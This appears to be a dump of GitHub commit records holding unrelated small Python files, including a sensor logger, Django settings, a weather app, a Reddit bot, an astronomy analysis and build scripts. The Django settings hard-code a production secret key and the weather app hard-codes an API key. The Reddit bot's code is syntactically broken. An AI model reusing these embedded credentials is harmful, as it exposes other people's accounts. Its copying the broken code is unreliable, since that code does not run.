IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
# NOTE:
# The sensor uses a thermistor to detect ambient temperature.
# The resistance of a thermistor will increase when the ambient temperature decreases.
#
# There are 3 revisions 1.0, 1.1 and 1.2, each using a different model thermistor.
# Each thermistor datasheet specifies a unique Nominal B-Constant which is used in the calculation forumla.
#
# The second argument in the grovepi.temp() method defines which board version you have connected.
# Defaults to '1.0'. eg.
# temp = grovepi.temp(sensor) # B value = 3975
# temp = grovepi.temp(sensor,'1.1') # B value = 4250
# temp = grovepi.temp(sensor,'1.2') # B value = 4250
import time
import grovepi
import datetime
from temboo.Library.Google.Spreadsheets import AddListRows
from temboo.core.session import TembooSession
# Connect the Grove Light Sensor to analog port A0
# SIG,NC,VCC,GND
light_sensor = 0
grovepi.pinMode(light_sensor, "INPUT")
# Connect the Grove Temperature Sensor to analog port A1
# SIG,NC,VCC,GND
temp_sensor = 1
# Connect the Grove Sound Sensor to analog port A2
# SIG,NC,VCC,GND
sound_sensor = 2
while True:
try:
# Get the current timestamp.
now = datetime.datetime.now()
timestamp = str(now)
# Get sensor values.
lightLevel = grovepi.analogRead(light_sensor)
temp = grovepi.temp(temp_sensor, '1.1')
soundLevel = grovepi.analogRead(sound_sensor)
# TODO: Get this from a humidity sensor.
humidity = "75"
# Show the sensor values for debugging.
print ("timestamp=", timestamp)
print ("lightLevel=", lightLevel)
print ("temp=", temp)
print ("soundLevel=", soundLevel)
# Send the sensor data to the Google Spreadsheet through Temboo.
# Create a session with your Temboo account details
session = TembooSession(“USERID”, “APPNAME”, “APPKEY”)
# Instantiate the Choreo
addListRowsChoreo = AddListRows(session)
# Get an InputSet object for the Choreo
addListRowsInputs = addListRowsChoreo.new_input_set()
# Set credential to use for execution
addListRowsInputs.set_credential('SensorData')
# Set the data to be added
addListRowsInputs.set_RowsetXML("""
<rowset>
<row>
<Timestamp>{0}</Timestamp>
<Temperature>{1}</Temperature>
<Humidity>{2}</Humidity>
<LightLevel>{3}</LightLevel>
<SoundLevel>{4}</SoundLevel>
</row>
</rowset>
""".format(timestamp, temp, humidity, lightLevel, soundLevel))
# Execute the Choreo
addListRowsResults = addListRowsChoreo.execute_with_results(addListRowsInputs)
# Print the Choreo outputs
print("Response: " + addListRowsResults.get_Response())
print("NewAccessToken: " + addListRowsResults.get_NewAccessToken())
# TODO: Delay and continue
break
time.sleep(.5)
except KeyboardInterrupt:
break
except IOError:
print ("Error")
| mit | Python | |
34f7d76cb1f56280b636f4b98968c17a8b9a2c14 | Create TestRSS.py | AllwinLeoPrakash/RSSFeedCollector | TestRSS.py | TestRSS.py | '''
Created on Jul 17, 2014
@author: ALLWINLEOPRAKASH
'''
import RssFeedCollector as rs
import datetime
rs.OPFileCheck()
var = 1
# Continuous active loop to retrieve real time data
while var == 1:
sec = datetime.datetime.now().second
# Check and append the new entries every 20 seconds
if sec % 20 == 0:
rs.FeedCollector()
| epl-1.0 | Python | |
3024ff0fe1343dac11adba82ec28d3a27f4e0d70 | add TXT | liam-middlebrook/gallery,liam-middlebrook/gallery,liam-middlebrook/gallery,liam-middlebrook/gallery | gallery/file_modules/txt.py | gallery/file_modules/txt.py | import os
from gallery.file_modules import FileModule
from gallery.util import hash_file
class TXTFile(FileModule):
def __init__(self, file_path):
FileModule.__init__(self, file_path)
self.mime_type = "text/plain"
| mit | Python | |
35da1d5dd86fd597f31c2fb816b2b7e3f89ab021 | Revert "removing settings.py, since it's ignored by .gitignore" | zg/CSCWebsite,rit-csc/CSCWebsite,rit-csc/CSCWebsite,zg/CSCWebsite,rit-csc/CSCWebsite,zg/CSCWebsite | csc_new/csc_new/settings.py | csc_new/csc_new/settings.py | """
Django settings for csc_new project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Template Directories
TEMPLATE_DIRS = (
'csc_new/templates',
)
# Reference our custom Member model as the default user model
#AUTH_USER_MODEL = 'member.Member'
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'pp0_w0sbde9&ye%!*i&!)76nq7-y22fbfpvb9heze*&)8j7dpi'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
TEMPLATE_DEBUG = False
ALLOWED_HOSTS = ['.cs.rit.edu']
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'pages',
# 'member',
'django.contrib.webdesign',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'csc_new.middleware.TemplateDoesNotExistMiddleware',
)
ROOT_URLCONF = 'csc_new.urls'
WSGI_APPLICATION = 'csc_new.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = "US/Eastern"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'staticfiles'),
)
| mit | Python | |
8bdc5c69ef2a45ca4eaeef6f096e1ddf688801b4 | Create Weather.py | Redder/Weather-App-Python | Weather.py | Weather.py | #Import all the libraries we need
import unirest
import json
import os
#Assign X to 1 for our loop (We can use a While True Loop too)
x = 1
#Prints Welcome Screen
os.system('cls')
print('================================')
print('Welcome to the Weather App!')
print('Press Enter to Continue!')
print('================================')
raw_input('')
#While Loops begins, You can use While True loop too
while x == 1:
#UserValue equals What the user inputs, the city or state
UserValue = raw_input('Please enter a City or State: ')
#Replace Space with a plus sign(So we can pass it onto the url)
UserValue = UserValue.replace(' ','+' )
#Make web request to the url(with url value attached) with the Mashape KEY and the content type
response = unirest.get("https://george-vustrey-weather.p.mashape.com/api.php?location=" + UserValue,
headers={
"X-Mashape-Key": "OhsfFL6TbrmshiTM9x9bpp7ySvSfp1Bjbiojsnj2DWPU7n2u6Z",
"Accept": "application/json"
}
)
#Assigned the JSON Data we recieved with the varible data
data = json.loads(response.raw_body)
#Try to extract data and apply to varibles
try:
DOW1 = data[0]["day_of_week"]
DOW2 = data[1]["day_of_week"]
DOW3 = data[2]["day_of_week"]
DOW4 = data[3]["day_of_week"]
DOW5 = data[4]["day_of_week"]
DOW6 = data[5]["day_of_week"]
DOW7 = data[6]["day_of_week"]
H1 = data[0]["high"]
H2 = data[1]["high"]
H3 = data[2]["high"]
H4 = data[3]["high"]
H5 = data[4]["high"]
H6 = data[5]["high"]
H7 = data[6]["high"]
L1 = data[0]["low"]
L2 = data[1]["low"]
L3 = data[2]["low"]
L4 = data[3]["low"]
L5 = data[4]["low"]
L6 = data[5]["low"]
L7 = data[6]["low"]
C1 = data[0]["condition"]
C2 = data[1]["condition"]
C3 = data[2]["condition"]
C4 = data[3]["condition"]
C5 = data[4]["condition"]
C6 = data[5]["condition"]
C7 = data[6]["condition"]
print('\n')
print('================================')
print(DOW1)
print('Condition: ' + C1)
print('High: ' + H1)
print('Low: ' + L1)
print('================================')
print('\n')
print('================================')
print(DOW2)
print('Condition: ' + C2)
print('High: ' + H2)
print('Low: ' + L2)
print('================================')
print('\n')
print('================================')
print(DOW3)
print('Condition: ' + C3)
print('High: ' + H3)
print('Low: ' + L3)
print('================================')
print('\n')
print('================================')
print(DOW4)
print('Condition: ' + C4)
print('High: ' + H4)
print('Low: ' + L4)
print('================================')
print('\n')
print('================================')
print(DOW5)
print('Condition: ' + C5)
print('High: ' + H5)
print('Low: ' + L5)
print('================================')
print('\n')
print('================================')
print(DOW6)
print('Condition: ' + C6)
print('High: ' + H6)
print('Low: ' + L6)
print('================================')
print('\n')
print('================================')
print(DOW7)
print('Condition: ' + C7)
print('High: ' + H7)
print('Low: ' + L7)
print('================================')
print('\n')
raw_input('')
pass
#If the data does not exist, it may be due to the user inputting something thats not a city or state
except KeyError, e:
#Clear Screen and show error message we get from API
os.system('cls')
print('Error ' + str(data[0]['code']) + ':' + ' ' + data[0]['message'])
raw_input('')
#Clear Screen and ask user if they want to quit or perform a search again
os.system('cls')
print('Would you like to search again? or Quit?')
print('1: Search again')
print('2: Quit')
ans = input('')
#If the quit, then x = 2 which breaks out of the loop, if Search again then do nothing and the Loop will restart
if ans == 2:
x = 2
| mit | Python | |
d4c30f4e70dabe18c73eeb0feaa49ee4dcead2ff | Create groceries.py | oliverwreath/Wide-Range-of-Webs,oliverwreath/Wide-Range-of-Webs,oliverwreath/Wide-Range-of-Webs,oliverwreath/Wide-Range-of-Webs | groceries.py | groceries.py | groceries = ["banana", "orange", "apple"]
stock = { "banana": 6,
"apple": 0,
"orange": 32,
"pear": 15
}
prices = { "banana": 4,
"apple": 2,
"orange": 1.5,
"pear": 3
}
# Write your code below!
def compute_bill(food):
total = 0
for item in food:
if stock[item] > 0:
total = total + prices[item]
stock[item] = stock[item] - 1
return total
| agpl-3.0 | Python | |
a8dc3e1143290495ab56b30660e7fbe58fcaa36c | add analysis script | gammapy/fhee | v01/analyse_data.py | v01/analyse_data.py | # this analysis script finds the photons with the highest energy for the crab nebula from the 2FHL event list
from numpy import *
from astropy.io import fits
hdulist=fits.open('gll_psch_v08.fit.gz')
print hdulist.info()
datalist=hdulist[1] #hdu=1 is the source catalog, found using "ftlist" or "hdulist.info()"
N=len(datalist.data)
print N
#loop over fermi 2FHL catalog
for i in range(N+1):
data= datalist.data[i-1] # -1 otherwise it raises an error
string =data['Source_Name']
if (string=='2FHL J0534.5+2201'):
x=data['RAJ2000']
y=data['DEJ2000']
print (x, y)
from astropy.io import fits
hdulist2=fits.open('2fhl_events.fits.gz')
print hdulist2.info()
datalist2=hdulist2[1] #hdu=1 is the event list
data2=datalist2.data
N=len(datalist2.data)
# prepare data
data2= datalist2.data
data2_x=data2['RA']
data2_y=data2['DEC']
data2_energy=data2['ENERGY']
r=sqrt(pow(data2_x-x,2)+pow(data2_y-y,2))
# initialize empty list for events
list = []
#loop over radii to find all events in a circle of 3 deg
for i in range(len(r)):
if r[i] < 3:
list.append(data2_energy[i])
print max(list)
a = sorted(list, reverse=True)
#finally print events with highest energies
print (a[1], a[2], a[3])
| mit | Python | |
52a83fa5fc6ca029c87b50c64e0e3d08bdf1d081 | Create pyton_test.py | tpaivaa/uraspi,tpaivaa/uraspi | pyton_test.py | pyton_test.py | import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BCM)
GPIO.setup(2, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(7, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(17, GPIO.OUT)
GPIO.setup(22, GPIO.OUT)
def verantavalo(channel):
time.sleep(0.1)
if GPIO.input(2) != GPIO.HIGH:
return
if(GPIO.input(17) == 0):
GPIO.output(17,1)
else:
GPIO.output(17,0)
def ulkovalo(channel):
time.sleep(0.1)
if GPIO.input(7) != GPIO.HIGH:
return
if(GPIO.input(22) == 0):
GPIO.output(22,1)
else:
GPIO.output(22,0)
GPIO.add_event_detect(2, GPIO.RISING, callback=verantavalo)
GPIO.add_event_detect(7, GPIO.RISING, callback=ulkovalo)
| mit | Python | |
096ea11231668e0fd03c1628c255cf0b08c0bfc3 | Create HouseCupBot.py | chrisxonPlugins/chrisxon,DW3B/HouseCupBot | HouseCupBot.py | HouseCupBot.py | import praw, time, sqlite3, operator, re
#Bot setup
username = 'HouseCupBot'
password = ''
userAgent = 'HouseCupBot. Keeps a running score for Hogwarts houses. Author: u/d_web'
houses = ['gryffindor','hufflepuff','ravenclaw','slytherin']
tagLine = 'HouseCupBot by u/D_Web. Type "HouseCupBot !help" for more info.'
replies = ['%s points awarded to %s\n\n', 'Current Standings:\n\n', 'Winners:\n\n', 'Need Help?']
#Set up SQL database. Create tables if they dont exist.
print 'Setting up SQL Database...',
sql = sqlite3.connect(housecupbot.db)
cur = sql.cursor()
cur.execute('CREATE TABLE IF NOT EXISTS oldposts(ID TEXT)')
cur.execute('CREATE TABLE IF NOT EXISTS scores(NAME TEXT, POINTS REAL))
cur.execute('CREATE TABLE IF NOT EXISTS winners(NAME TEXT, TIME_PER TEXT, POINTS REAL))
sql.commit()
print 'DONE'
#Log in to reddit
print 'Logging in to Reddit...',
r = praw.Reddit(userAgent)
r.login(username, password)
print 'DONE'
def sortedDict(dict):
s_dict = sorted(dict.iteritems(), key=operator.itemgetter(1))
return s_dict[len(s_dict)-1]
def subScan():
sub = r.get_subreddit('all')
posts = sub.get_comments(limit=100)
for post in posts:
pid = post.id
try:
p_auth = post.author.name
except:
p_auth = '[DELETED]'
cur.execute('SELECT * FROM oldposts WHERE ID=?', pid)
if not cur.fetchone():
cur.execute('INSERT INTO oldposts VALUES(?)', pid)
p_body = post.body.lower()
for house in houses:
re_result = re.match('\A\d{1,3}\spoints for %s$' % house, p_body)
if re_result:
pass
| mit | Python | |
5411224e9683c9ee6a8b06ff9b666a93948e6a69 | Create example.py | garygitt/pyqtable | example.py | example.py | #TABLE LOAD
self.table_data = QtGui.QTableView()
cols=['rowid','data']
data = [(1,'data1'),(2,'data2'),]
table.load(self.table_data,data,cols,order=0,col=0)
#TABLE SORT
def context(self,pos):
mainmenu = QtGui.QMenu("Menu", self)
mainmenu.addAction("Sort")
C = self.mapFromGlobal(QCursor.pos())
pos.setY(C.y()); pos.setX(C.x())
action = mainmenu.exec_(self.mapToGlobal(pos))
if action.text() == 'Sort':
table.sort(self.sender())
| artistic-2.0 | Python | |
8e1e905f5dbdaccc396ec74fb7c05a93d79c35ff | Add example to show failure for #62. | talitarossari/flasgger,flasgger/flasgger,rochacbruno/flasgger,rochacbruno/flasgger,talitarossari/flasgger,rochacbruno/flasgger,talitarossari/flasgger,flasgger/flasgger,flasgger/flasgger,flasgger/flasgger | examples/example_blueprint.py | examples/example_blueprint.py | from flask import Blueprint, Flask, jsonify
from flasgger import Swagger
from flasgger.utils import swag_from
app = Flask(__name__)
example_blueprint = Blueprint("example_blueprint", __name__)
@example_blueprint.route('/usernames', methods=['GET', 'POST'])
@swag_from('username_specs.yml', methods=['GET'])
@swag_from('username_specs.yml', methods=['POST'])
def usernames(username):
return jsonify({'username': username})
swag = Swagger(app, config={})
if __name__ == "__main__":
app.run(debug=True)
| mit | Python | |
158d3c6478f4d9d83d166504febc2ba1ba4e58f7 | Add example. | Kami/python-libcloud-dns-to-bind-zone | example.py | example.py | # Licensed to Tomaz Muraus under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# Tomaz muraus licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from libcloud.dns.types import Provider
from libcloud.dns.providers import get_driver
from libcloud_to_bind import libcloud_zone_to_bind_zone_file
DOMAIN_TO_EXPORT = 'example.com'
Zerigo = get_driver(Provider.ZERIGO)
driver = Zerigo('email', 'api key')
zones = driver.list_zones()
zone = [z for z in zones if z.domain == DOMAIN_TO_EXPORT][0]
result = libcloud_zone_to_bind_zone_file(zone=zone)
print(result)
| apache-2.0 | Python | |
7c87974c862184df8df40595ba26f5ff7082c4a6 | Add a CIB routing fuzzer | gatecat/prjoxide,gatecat/prjoxide,gatecat/prjoxide | fuzzers/LIFCL/002-cib-routing/fuzzer.py | fuzzers/LIFCL/002-cib-routing/fuzzer.py | from fuzzconfig import FuzzConfig
from interconnect import fuzz_interconnect
import re
configs = [
((1, 18), FuzzConfig(job="CIBTROUTE", device="LIFCL-40", sv="../shared/route_40.v", tiles=["CIB_R1C18:CIB_T"]), set(["TAP_CIBT_R1C14:TAP_CIBT"])),
((18, 1), FuzzConfig(job="CIBLRROUTE", device="LIFCL-40", sv="../shared/route_40.v", tiles=["CIB_R18C1:CIB_LR"]), set(["TAP_PLC_R18C14:TAP_PLC"])),
((28, 17), FuzzConfig(job="CIBROUTE", device="LIFCL-40", sv="../shared/route_40.v", tiles=["CIB_R28C17:CIB"]), set(["TAP_PLC_R28C14:TAP_PLC"]))
]
def main():
for rc, cfg, ignore in configs:
cfg.setup()
r, c = rc
nodes = ["R{}C{}_J*".format(r, c)]
extra_sources = []
extra_sources += ["R{}C{}_H02E{:02}01".format(r, c+1, i) for i in range(8)]
extra_sources += ["R{}C{}_H06E{:02}03".format(r, c+3, i) for i in range(4)]
extra_sources += ["R{}C{}_V02N{:02}01".format(r-1, c, i) for i in range(8)]
extra_sources += ["R{}C{}_V06N{:02}03".format(r-3, c, i) for i in range(4)]
extra_sources += ["R{}C{}_V02S{:02}01".format(r+1, c, i) for i in range(8)]
extra_sources += ["R{}C{}_V06S{:02}03".format(r+3, c, i) for i in range(4)]
extra_sources += ["R{}C{}_H02W{:02}01".format(r, c-1, i) for i in range(8)]
extra_sources += ["R{}C{}_H06W{:02}03".format(r, c-3, i) for i in range(4)]
def pip_filter(pip, nodes):
from_wire, to_wire = pip
return not ("_CORE" in from_wire or "_CORE" in to_wire or "JCIBMUXOUT" in to_wire)
fuzz_interconnect(config=cfg, nodenames=nodes, regex=True, bidir=True, ignore_tiles=ignore,
pip_predicate=pip_filter)
fuzz_interconnect(config=cfg, nodenames=extra_sources, regex=False, bidir=False, ignore_tiles=ignore,
pip_predicate=pip_filter)
if __name__ == "__main__":
main()
| isc | Python | |
bbbdaed24390b7c5808cc7233b6ad0566c09f188 | add python C wrapper; mostly empty for now | jobovy/galpy,followthesheep/galpy,followthesheep/galpy,jobovy/galpy,jobovy/galpy,followthesheep/galpy,jobovy/galpy,followthesheep/galpy | galpy/orbit_src/integratePlanarOrbit.py | galpy/orbit_src/integratePlanarOrbit.py | def integratePlanarOrbit_leapfrog(pot,yo,t,rtol=None,atol=None):
"""
NAME:
integratePlanarOrbit_leapfrog
PURPOSE:
leapfrog integrate an ode for a planarOrbit
INPUT:
pot - Potential or list of such instances
yo - initial condition [q,p]
t - set of times at which one wants the result
rtol, atol
OUTPUT:
y : array, shape (len(y0), len(t))
Array containing the value of y for each desired time in t, \
with the initial value y0 in the first row.
HISTORY:
2011-10-03 - Written - Bovy (NYU)
"""
| bsd-3-clause | Python | |
7b560ea31ad4e308d01926f1e73cb6deb6b24a6a | Clarify location of settings/local.py-dist | mythmon/airmozilla,mythmon/airmozilla,anu7495/airmozilla,tannishk/airmozilla,EricSekyere/airmozilla,zofuthan/airmozilla,blossomica/airmozilla,EricSekyere/airmozilla,lcamacho/airmozilla,ehsan/airmozilla,kenrick95/airmozilla,kenrick95/airmozilla,mythmon/airmozilla,zofuthan/airmozilla,anjalymehla/airmozilla,EricSekyere/airmozilla,anjalymehla/airmozilla,ehsan/airmozilla,EricSekyere/airmozilla,chirilo/airmozilla,anu7495/airmozilla,zofuthan/airmozilla,blossomica/airmozilla,anjalymehla/airmozilla,anu7495/airmozilla,anjalymehla/airmozilla,a-buck/airmozilla,kenrick95/airmozilla,tannishk/airmozilla,blossomica/airmozilla,Nolski/airmozilla,Nolski/airmozilla,bugzPDX/airmozilla,chirilo/airmozilla,mozilla/airmozilla,chirilo/airmozilla,a-buck/airmozilla,zofuthan/airmozilla,kenrick95/airmozilla,mozilla/airmozilla,Nolski/airmozilla,a-buck/airmozilla,lcamacho/airmozilla,bugzPDX/airmozilla,blossomica/airmozilla,mythmon/airmozilla,chirilo/airmozilla,Nolski/airmozilla,tannishk/airmozilla,zofuthan/airmozilla,chirilo/airmozilla,kenrick95/airmozilla,lcamacho/airmozilla,lcamacho/airmozilla,mythmon/airmozilla,mozilla/airmozilla,mozilla/airmozilla,lcamacho/airmozilla,tannishk/airmozilla,a-buck/airmozilla,ehsan/airmozilla,EricSekyere/airmozilla,anu7495/airmozilla,bugzPDX/airmozilla,anjalymehla/airmozilla,bugzPDX/airmozilla,anu7495/airmozilla,Nolski/airmozilla,ehsan/airmozilla,ehsan/airmozilla,tannishk/airmozilla | airmozilla/settings/__init__.py | airmozilla/settings/__init__.py | from .base import *
try:
from .local import *
except ImportError, exc:
exc.args = tuple(['%s (did you rename airmozilla/settings/local.py-dist?)' % exc.args[0]])
raise exc
| from .base import *
try:
from .local import *
except ImportError, exc:
exc.args = tuple(['%s (did you rename settings/local.py-dist?)' % exc.args[0]])
raise exc
| bsd-3-clause | Python |
70b21201df3c1b6e476f8dbfee53490bd16a6d00 | Add Fabric fabfile for project management | riggsd/davies | fabfile.py | fabfile.py | """
Fabric fabfile for Davies cave survey package.
Run `pip install fabric` to install, then `fab --list` to see available commands.
"""
from fabric.api import local, lcd, with_settings
def test():
"""Run project unit tests."""
local('python -m unittest discover -v -s tests')
unittest = test
@with_settings(warn_only=True)
def pep8():
"""Check source for PEP8 conformance."""
local('pep8 --max-line-length=120 davies')
def precommit():
"""Run pre-commit unit tests and lint checks."""
pep8()
local('pylint -f colorized --errors-only davies')
test()
def lint(fmt='colorized'):
"""Run verbose PyLint on source. Optionally specify fmt=html for HTML output."""
if fmt == 'html':
outfile = 'pylint_report.html'
local('pylint -f %s davies > %s || true' % (fmt, outfile))
local('open %s' % outfile)
else:
local('pylint -f %s davies || true' % fmt)
pylint = lint
def clean():
"""Clean up generated files."""
local('rm -rf dist')
local('rm -f pylint_report.html')
local('find . -name "*.pyc" | xargs rm')
with lcd('docs'):
local('make clean')
def release(version):
"""Perform git-flow release merging and PyPI upload."""
clean()
local('git co master')
local('git merge --no-ff dev')
local('git tag %s' % version)
local('python setup.py sdist upload')
def doc(fmt='html'):
"""Build Sphinx HTML documentation."""
with lcd('docs'):
local('make %s' % fmt)
if fmt == 'html':
local('open docs/_build/html/index.html')
docs = doc
| mit | Python | |
609784dc106e01800eed0a7ccf88f82d6977d408 | Add missed language update migrations | cdubz/babybuddy,cdubz/babybuddy,cdubz/babybuddy | babybuddy/migrations/0008_auto_20200120_0622.py | babybuddy/migrations/0008_auto_20200120_0622.py | # Generated by Django 3.0.2 on 2020-01-20 14:22
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('babybuddy', '0007_auto_20190607_1422'),
]
operations = [
migrations.AlterField(
model_name='settings',
name='language',
field=models.CharField(choices=[('en', 'English'), ('fr', 'French'), ('de', 'German'), ('es', 'Spanish'), ('sv', 'Swedish'), ('tr', 'Turkish')], default='en', max_length=255, verbose_name='Language'),
),
]
| bsd-2-clause | Python | |
ce21eafe126407229ae81d926fccd311035eb7cc | Add local fnmatch module (from Python 2.6) | pocke/editorconfig-vim,benjifisher/editorconfig-vim,johnfraney/editorconfig-vim,johnfraney/editorconfig-vim,VictorBjelkholm/editorconfig-vim,johnfraney/editorconfig-vim,benjifisher/editorconfig-vim,pocke/editorconfig-vim,dublebuble/editorconfig-gedit,dublebuble/editorconfig-gedit,VictorBjelkholm/editorconfig-vim,pocke/editorconfig-vim,VictorBjelkholm/editorconfig-vim,benjifisher/editorconfig-vim,dublebuble/editorconfig-gedit | fnmatch.py | fnmatch.py | """Filename matching with shell patterns.
fnmatch(FILENAME, PATTERN) matches according to the local convention.
fnmatchcase(FILENAME, PATTERN) always takes case in account.
The functions operate by translating the pattern into a regular
expression. They cache the compiled regular expressions for speed.
The function translate(PATTERN) returns a regular expression
corresponding to PATTERN. (It does not compile it.)
Based on code from fnmatch.py file distributed with Python 2.6.
Licensed under PSF License (see PYTHON_LICENSE.txt file).
"""
import re
__all__ = ["filter", "fnmatch","fnmatchcase","translate"]
_cache = {}
def fnmatch(name, pat):
"""Test whether FILENAME matches PATTERN.
Patterns are Unix shell style:
* matches everything
? matches any single character
[seq] matches any character in seq
[!seq] matches any char not in seq
An initial period in FILENAME is not special.
Both FILENAME and PATTERN are first case-normalized
if the operating system requires it.
If you don't want this, use fnmatchcase(FILENAME, PATTERN).
"""
import os
name = os.path.normcase(name)
pat = os.path.normcase(pat)
return fnmatchcase(name, pat)
def filter(names, pat):
"""Return the subset of the list NAMES that match PAT"""
import os,posixpath
result=[]
pat=os.path.normcase(pat)
if not pat in _cache:
res = translate(pat)
_cache[pat] = re.compile(res)
match=_cache[pat].match
if os.path is posixpath:
# normcase on posix is NOP. Optimize it away from the loop.
for name in names:
if match(name):
result.append(name)
else:
for name in names:
if match(os.path.normcase(name)):
result.append(name)
return result
def fnmatchcase(name, pat):
"""Test whether FILENAME matches PATTERN, including case.
This is a version of fnmatch() which doesn't case-normalize
its arguments.
"""
if not pat in _cache:
res = translate(pat)
_cache[pat] = re.compile(res)
return _cache[pat].match(name) is not None
def translate(pat):
"""Translate a shell PATTERN to a regular expression.
There is no way to quote meta-characters.
"""
i, n = 0, len(pat)
res = ''
while i < n:
c = pat[i]
i = i+1
if c == '*':
res = res + '.*'
elif c == '?':
res = res + '.'
elif c == '[':
j = i
if j < n and pat[j] == '!':
j = j+1
if j < n and pat[j] == ']':
j = j+1
while j < n and pat[j] != ']':
j = j+1
if j >= n:
res = res + '\\['
else:
stuff = pat[i:j].replace('\\','\\\\')
i = j+1
if stuff[0] == '!':
stuff = '^' + stuff[1:]
elif stuff[0] == '^':
stuff = '\\' + stuff
res = '%s[%s]' % (res, stuff)
else:
res = res + re.escape(c)
return res + '\Z(?ms)'
| bsd-2-clause | Python | |
13a45b0b1ab811d6e0ba131380961fba59e8963c | Create w3_1.py | s40523215/2016fallcp_hw,s40523215/2016fallcp_hw,s40523215/2016fallcp_hw | w3_1.py | w3_1.py | print("test")
| agpl-3.0 | Python | |
5b456b6cdbd76b1e51548775ec0118a28db98ef2 | add test-backend script | skotep/webdev,skotep/webdev | sample/RiceBookServer/test-backend.py | sample/RiceBookServer/test-backend.py | #!/usr/bin/env python
import requests, json, sys, pprint
pp = pprint.PrettyPrinter(indent=4)
class cc:
HEADER = '\033[95m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def get(endpoint):
url = config["backend"] + endpoint
r = requests.get(url)
if r.status_code != 200:
print(cc.FAIL + ("ERROR: For GET %s received %d response code " % (endpoint, r.status_code)) + str(r.text) + cc.ENDC)
sys.exit(1)
return json.loads(r.text)
def put(endpoint):
url = config["backend"] + endpoint
r = requests.put(url)
if r.status_code != 200:
print(cc.FAIL + ("ERROR: For PUT %s received %d response code " % (endpoint, r.status_code)) + str(r.text) + cc.ENDC)
sys.exit(1)
return json.loads(r.text)
def getPosts(postId=None):
endpoint = '/posts'
if postId is not None:
endpoint = (endpoint + "/%d") % postId
return checkPosts(get(endpoint))
def checkPosts(result):
if "posts" not in result:
print(cc.FAIL + "ERROR: GET /posts did not have \"posts\" entry" + cc.ENDC)
print(result)
return []
else:
return result["posts"]
def addPost(body):
r = requests.post(config["backend"] + "/post", json={'body':body})
return checkPosts( json.loads(r.text) )
def msg(message):
print(cc.BLUE + message + cc.ENDC)
################################################
if len(sys.argv) < 2:
print("usage: %s README.json" % sys.argv[0])
sys.exit(1)
with open(sys.argv[1], 'r') as f:
config = json.loads(f.read())
for key in config.keys():
if config[key].endswith('/'):
config[key] = (config[key])[:-1]
print(cc.YELLOW + ("Checking for %s site %s" % (config['netid'], config['backend'])) + cc.ENDC)
######################################
# inital GET
r = get("/")
msg("GET /")
pp.pprint(r)
# GET /posts
posts = getPosts()
msg("GET /posts")
pp.pprint(posts)
if len(posts) < 3:
print(cc.FAIL + ("FAIL: Expected at least 3 posts from GET /posts but found %d " % len(posts)) + cc.ENDC)
else:
print(cc.GREEN + ("OK: GET /posts returned %d posts, expecting at least 3" % len(posts)) + cc.ENDC)
######################################
# add a new post
body = "Hello World!"
newPosts = addPost(body)
msg("POST /post -d " + body)
pp.pprint(newPosts)
if len(newPosts) is not 1:
print(cc.FAIL + ("FAIL: Expected 1 new post added but found %d posts" % len(newPosts)) + cc.ENDC)
else:
newPostId = newPosts[0]['id']
print(cc.GREEN + ("OK: POST /post returned one new post with id=%d" % newPostId) + cc.ENDC)
if newPosts[0]['body'] != body:
print(cc.FAIL + ("FAIL: Post did not have the correct body message: %s vs %s" % (newPosts[0]['body'], body)) + cc.ENDC)
else:
print(cc.GREEN + ("OK: post body was correct") + cc.ENDC)
######################################
# get that new post by itself
getNewPost = getPosts(newPostId)
msg("GET /posts/%d" % newPostId)
pp.pprint(getNewPost)
